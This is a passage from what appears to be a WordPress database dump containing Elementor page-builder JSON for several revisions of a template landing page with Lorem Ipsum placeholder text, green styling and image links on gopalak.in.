\",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(7705,1382,'_elementor_page_assets','a:0:{}'),(7711,1384,'_elementor_edit_mode','builder'),(7712,1384,'_elementor_template_type','wp-page'),(7713,1384,'_elementor_version','3.7.6'),(7714,1384,'_wp_page_template','elementor_canvas'),(7715,1384,'_elementor_data','[{\"id\":\"3051cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"49cbdad\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2074e4d\",\"elType\":\"widget\",\"settings\":{\"anchor\":\"home\"},\"elements\":[],\"widgetType\":\"menu-anchor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"e7e4c38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"3778299\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"c923623\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"916798d\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(7716,1384,'_elementor_page_assets','a:0:{}'),(7718,1385,'_elementor_edit_mode','builder'),(7719,1385,'_elementor_template_type','wp-page'),(7720,1385,'_elementor_version','3.7.6'),(7721,1385,'_wp_page_template','elementor_canvas'),(7722,1385,'_elementor_data','[{\"id\":\"3051cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"49cbdad\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2074e4d\",\"elType\":\"widget\",\"settings\":{\"anchor\":\"home\"},\"elements\":[],\"widgetType\":\"menu-anchor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"e7e4c38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"3778299\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"c923623\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"916798d\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST 